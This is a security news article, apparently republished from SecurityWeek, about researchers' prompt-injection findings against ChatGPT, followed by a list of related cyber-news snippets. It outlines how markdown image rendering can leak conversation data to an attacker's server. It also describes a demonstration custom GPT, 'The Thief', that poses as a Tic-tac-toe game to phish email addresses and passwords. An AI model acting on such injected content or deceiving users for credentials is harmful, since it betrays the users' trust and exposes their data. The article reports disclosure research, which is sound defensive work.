Malicious GPT Can Phish Credentials, Exfiltrate Them to External Server: Researcher

A researcher has shown how malicious actors could create custom GPTs that can phish for user credentials and exfiltrate the stolen data to an external server.
Researchers Johann Rehberger and Roman Samoilenko independently discovered in the spring of 2023 that ChatGPT was vulnerable to a prompt injection attack that involved the chatbot rendering markdown images.
They demonstrated how an attacker could leverage image markdown rendering to steal potentially sensitive information from a user's conversation with ChatGPT by getting the victim to paste apparently harmless but malicious content from the attacker's website.
The attack also works by asking ChatGPT to summarize the content from a website hosting specially crafted code.
In both cases, the markdown image processed by the chatbot - which can be an invisible single-pixel image - is hosted on the attacker's site.
ChatGPT creator OpenAI was informed about the attack method at the time, but said it was a feature that it did not plan on addressing.
Rehberger said similar issues were found in chatbots such as Bing Chat, Google's Bard and Anthropic Claud, whose developers released fixes.
The researcher noticed this week that OpenAI has also started taking action to tackle the attack method.
The mitigations have apparently only been applied to the web application - the attack still works on mobile apps - and they don't completely prevent attacks.
On December 12, before OpenAI started rolling out mitigations, Rehberger published a blog post describing how the image markdown injection issue can be exploited in combination with custom versions of ChatGPT. OpenAI announced in November that Plus and Enterprise users of ChatGPT would be allowed to create their own GPT, which they can customize for specific tasks or topics.
Rehberger created a GPT named 'The Thief' that attempts to trick users into handing over their email address and password and then exfiltrates the data to an external server controlled by the attacker without the victim's knowledge.
This GPT claims to play a game of Tic-tac-toe against the user and requires an email address for a 'personalized experience' and the user's password as part of a 'security process'.
The provided information is then sent to the attacker's server.
The researcher also showed how an attacker may be able to publish such a malicious GPT on the official GPTStore.
OpenAI has implemented a system that prevents the publishing of GPTs that are obviously malicious.
SecurityWeek has reached out to OpenAI for comment on the security research and will update this article if the company responds.


This Cyber News was published on www.securityweek.com. Publication date: Fri, 22 Dec 2023 11:13:05 +0000


Cyber News related to Malicious GPT Can Phish Credentials, Exfiltrate Them to External Server: Researcher

GPT in Slack With React Integration - Understanding GPT. Before delving into the intricacies of GPT Slack React integration, let's grasp the fundamentals of GPT. Developed by OpenAI, GPT is a state-of-the-art language model that utilizes deep learning to generate human-like text based on ...
1 year ago Feeds.dzone.com
Malicious GPT Can Phish Credentials, Exfiltrate Them to External Server: Researcher - A researcher has shown how malicious actors could create custom GPTs that can phish for user credentials and exfiltrate the stolen data to an external server. Researchers Johann Rehberger and Roman Samoilenko independently discovered in the spring of ...
1 year ago Securityweek.com
Leak confirms OpenAI's GPT 4.1 is coming before GPT 5.0 - As spotted by AI researcher Tibor Blaho, OpenAI is already testing model art for o3, o4-mini, and GPT-4.1 (including nano and mini variants) on the OpenAI API platform. Also, GPT-5 isn't happening anytime soon, as OpenAI plans to focus on o3, ...
3 months ago Bleepingcomputer.com
STRIDE GPT - AI-powered Tool LLMs To Generate Threat Models - STRIDE GPT, an AI-powered threat modeling tool, leverages the capabilities of large language models (LLMs) to generate comprehensive threat models and attack trees for applications, ensuring a proactive approach to security. In conclusion, STRIDE GPT ...
3 months ago Cybersecuritynews.com Inception
Malicious ChatGPT Agents May Steal Chat Messages and Data - In November 2023, OpenAI released GPTs publicly for everyone to create their customized version of GPT models. Several new customized GPTs were created for different purposes. On the other hand, threat actors can also utilize this public GPT model to ...
1 year ago Cybersecuritynews.com
OpenAI prepares GPT-5 for roll out - "GPT-5 is our next foundational model that is meant to just make everything our models can currently do better and with less model switching," Jerry Tworek, who is a VP at OpenAI, wrote in a Reddit post. My sources tell me that GPT-5 could ...
1 week ago Bleepingcomputer.com
OpenAI's GPT 4.5 spotted in Android beta, launch imminent - As a result, OpenAI CEO Sam Altman recently announced that ChatGPT will simplify its model names and release versions like GPT-4.5, GPT-5, and so on. Beyond the references to GPT-4.5, AI researcher Tibor Blaho has spotted a few additional experiments ...
5 months ago Bleepingcomputer.com
ChatGPT 4.1 fails to beat Google Gemini 2.5 in early benchmarks - According to benchmarks shared by Stagehand, which is a production-ready browser automation framework, Gemini 2.0 Flash has the lowest error rate (6.67%) along with the highest exact‑match score (90%), and it’s also cheap and fast. ...
3 months ago Bleepingcomputer.com
ChatGPT 4.1 early benchmarks compared against Google Gemini - For example, GPT‑4.1 scores 54.6% on SWE-bench Verified, which is better than GPT-4o by 21.4% and 26.6% over GPT‑4.5. We have similar results on other benchmarking tools shared by OpenAI, but how does it compete against Gemini ...
3 months ago Bleepingcomputer.com
ChatGPT"s GPT-5-reasoning-alpha model spotted ahead of launch - GPT-5 might be just a few days or weeks away, as we've spotted references to a new model called gpt-5-reasoning-alpha-2025-07-13. Other researchers have also dropped hints that GPT-5 will combine breakthroughs from all models to create a unified ...
3 weeks ago Bleepingcomputer.com
OpenAI rolls out imperfect fix for ChatGPT data leak flaw - OpenAI has mitigated a data exfiltration bug in ChatGPT that could potentially leak conversation details to an external URL. According to the researcher who discovered the flaw, the mitigation isn't perfect, so attackers can still exploit it under ...
1 year ago Bleepingcomputer.com
CVE-2023-37274 - Auto-GPT is an experimental open-source application showcasing the capabilities of the GPT-4 language model. When Auto-GPT is executed directly on the host system via the provided run.sh or run.bat files, custom Python code execution is sandboxed ...
2 years ago
OpenAI says GPT-5 will unify breakthroughs from different models - OpenAI has again confirmed that it will unify multiple models into one and create GPT-5, which is expected to ship sometime in the summer. "GPT-5 is our next foundational model that is meant to just make everything our models can currently do better ...
1 month ago Bleepingcomputer.com
OpenAI: GPT-5 is coming, "we'll see" if it creates a shockwave - Ahead of GPT-5 debut, OpenAI announced ChatGPT Agent, which can think and act, proactively choose from a toolbox of agentic skills to complete tasks for you using its own computer. In addition to GPT-5, OpenAI plans to upgrade Operator and ...
3 weeks ago Bleepingcomputer.com
Credentials are Still King: Leaked Credentials, Data Breaches and Dark Web Markets - Infostealers infect computers, steal all of the credentials saved in the browser along with active session cookies and other data, then export it back to command and control infrastructure before, in some cases, self-terminating. This article will ...
1 year ago Bleepingcomputer.com
AI models can be weaponized to hack websites on their own The Register - AI models, the subject of ongoing safety concerns about harmful and biased output, pose a risk beyond content emission. When wedded with tools that enable automated interaction with other systems, they can act on their own as malicious agents. ...
1 year ago Go.theregister.com
Latest Information Security and Hacking Incidents - Recently, OpenAI and WHOOP collaborated to launch a GPT-4-powered, individualized health and fitness coach. A multitude of questions about health and fitness can be answered by WHOOP Coach. In addition to WHOOP, Summer Health, a text-based pediatric ...
1 year ago Cysecurity.news
ChatGPT 4 can exploit 87% of one-day vulnerabilities - Since the widespread and growing use of ChatGPT and other large language models in recent years, cybersecurity has been a top concern. ChatGPT 4 quickly exploited one-day vulnerabilities. During the study, the team used 15 one-day vulnerabilities ...
1 year ago Securityintelligence.com
One Phish, Two Phish, Red Phish, Blue Phish - I sat down for a chat with George Skouroupathis, our phishing expert at Resonance Security. Phishing is often the first step taken by hackers in a larger scam. There are lots of different kinds of phishing attacks, but one of the most prevalent is ...
1 year ago Hackread.com
Data thieves abuse Microsoft's 'verified publisher' status The Register - Miscreants using malicious OAuth applications abused Microsoft's "Verified publisher" status to gain access to organizations' cloud environments, then steal data and pry into to users' mailboxes, calendars, and meetings. According to researchers with ...
2 years ago Packetstormsecurity.com Lazarus Group
OpenAI's New GPT Store May Carry Data Security Risks - A new kind of app store for ChatGPT may expose users to malicious bots, and legitimate ones that siphon their data to insecure, external locales. ChatGPT's fast rise in popularity, combined with the open source accessibility of the early GPT models, ...
1 year ago Darkreading.com
Pen Testing Across the Environment: External, Internal, and Wireless Assessments - Among other controls, penetration testing stands out because it simulates attackers' malicious activities and tactics to identify security gaps in business systems or applications. Because pen tests thoroughly investigate vulnerabilities, the scope ...
1 year ago Securityboulevard.com
Hacker Conversations: Runa Sandvik - The driving motivation for almost all cybersecurity researchers is an insatiable curiosity - it's like an itch that must be scratched. How that itch is scratched is the difference between different researchers. Runa Sandvik describes herself as a ...
1 year ago Securityweek.com
What happens when you accidentally leak your AWS API keys? - My situation had no ill consequences, but it could have if I had used my actual email for the script or if my project was bigger and I had used AWS or another cloud provider and hardcoded those credentials. In a later class I did learn how to safely ...
1 year ago Isc.sans.edu
CVE-2023-37273 - Auto-GPT is an experimental open-source application showcasing the capabilities of the GPT-4 language model. Running Auto-GPT version prior to 0.4.3 by cloning the git repo and executing `docker compose run auto-gpt` in the repo root uses a different ...
2 years ago